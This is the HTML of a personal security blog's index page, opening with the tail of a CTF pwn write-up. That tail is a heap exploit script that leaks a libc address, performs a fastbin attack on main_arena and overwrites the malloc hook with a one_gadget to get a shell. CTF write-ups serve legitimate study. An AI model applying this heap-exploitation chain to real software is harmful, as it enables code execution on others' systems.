class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#2 #40</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x20</span>)<span class="comment">#3 #90</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#4 #c0</span></span><br><span class="line">update(<span class="number">0</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x61&#x27;</span>)</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x10</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">2</span>,<span class="number">0x40</span>,<span class="number">8</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">dele(<span class="number">1</span>)<span class="comment">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x50</span>)<span class="comment">#1 20</span></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x30</span>,<span class="number">6</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">4</span>,<span class="number">0x40</span>,<span class="number">4</span>*(p64(<span class="number">0x0</span>) + p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="comment">#2  40</span></span><br><span class="line">view(<span class="number">1</span>)</span><br><span class="line">p.recv(<span class="number">0x2a</span>)<span class="comment">#2a</span></span><br><span class="line">a = p.recv(<span class="number">8</span>)</span><br><span class="line">main_ar = u64(a)</span><br><span class="line">success(hex(u64(a)))</span><br><span class="line">libcc = u64(a) - <span class="number">0x3c4b78</span></span><br><span class="line">success(hex(libcc))</span><br><span class="line"></span><br><span class="line"><span class="comment">#--calloc unsortbin</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#2 40 </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#5 90</span></span><br><span class="line"><span class="comment">#--free to fastbins</span></span><br><span class="line">update(<span class="number">5</span>,<span class="number">0x10</span>,<span class="number">2</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)))</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x50</span>,<span class="number">10</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x51</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="comment">#2</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#--change mainarena </span></span><br><span class="line">des_addr = main_ar - <span class="number">0x40</span></span><br><span class="line">a = p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0x41</span>) + p64(<span class="number">51</span>)</span><br><span class="line">update(<span class="number">1</span>,len(a),a)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#2 40</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#--fastbin attack </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#6  </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#7 130</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#8 150</span></span><br><span class="line">update(<span class="number">6</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x41&#x27;</span>)</span><br><span class="line">update(<span class="number">8</span>,<span class="number">0x30</span>,<span class="number">6</span>*(p64(<span class="number">0</span>)+ p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span class="number">7</span>)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#7 130</span></span><br><span class="line">b= p64(<span class="number">0</span>)+p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x41</span>) + p64(des_addr)+p64(<span class="number">0</span>)</span><br><span class="line">update(<span class="number">7</span>,len(b),b)</span><br><span class="line">dele(<span class="number">8</span>)</span><br><span class="line">update(<span class="number">7</span>,len(b),b)</span><br><span class="line"></span><br><span class="line"><span class="comment">#--change topchunk</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#8</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x38</span>)<span class="comment">#9</span></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">6</span> + p64(des_addr-<span class="number">56</span>)</span><br><span class="line">update(<span class="number">9</span>,len(payload),payload)</span><br><span class="line"><span class="comment">#--change mallloc hook</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#10</span></span><br><span class="line">payload2 = libcc + <span class="number">0x4526a</span></span><br><span class="line">update(<span class="number">10</span>,len(p64(payload2)),p64(payload2))</span><br><span class="line"><span class="keyword">new</span>(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>







<h2 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h2><h2 id="pwn33"><a href="#pwn33" class="headerlink" title="pwn33"></a>pwn33</h2><h2 id="pwn55"><a href="#pwn55" class="headerlink" title="pwn55"></a>pwn55</h2>
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/" class="post-title-link" itemprop="url">pwn入门到放弃笔记</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-01-15 20:58:15 / Modified: 21:16:06" itemprop="dateCreated datePublished" datetime="2022-01-15T20:58:15+08:00">2022-01-15</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sec/" itemprop="url" rel="index"><span itemprop="name">sec</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="简述1"><a href="#简述1" class="headerlink" title="简述1"></a>简述1</h1><p>栈（stack）：存放局部变量，如函数的参数、返回地址、局部变量等，有系统自动分配和释放</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/#more" rel="contents">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/" class="post-title-link" itemprop="url">gitee_blog测试</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-01-13 00:11:19" itemprop="dateCreated datePublished" datetime="2022-01-13T00:11:19+08:00">2022-01-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-01-15 21:16:25" itemprop="dateModified" datetime="2022-01-15T21:16:25+08:00">2022-01-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/" itemprop="url" rel="index"><span itemprop="name">杂七杂八</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>描述就不描述了</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/12/hello-world/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/12/hello-world/" class="post-title-link" itemprop="url">Hello World</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-01-12 23:24:35" itemprop="dateCreated datePublished" datetime="2022-01-12T23:24:35+08:00">2022-01-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-01-15 21:16:28" itemprop="dateModified" datetime="2022-01-15T21:16:28+08:00">2022-01-15</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>Welcome to <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a target="_blank" rel="noopener" href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a target="_blank" rel="noopener" href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a target="_blank" rel="noopener" href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/12/hello-world/#more" rel="contents">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  


  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">dong</p>
  <div class="site-description" itemprop="description">数据方面、网络安全方面的记事本</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dong</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
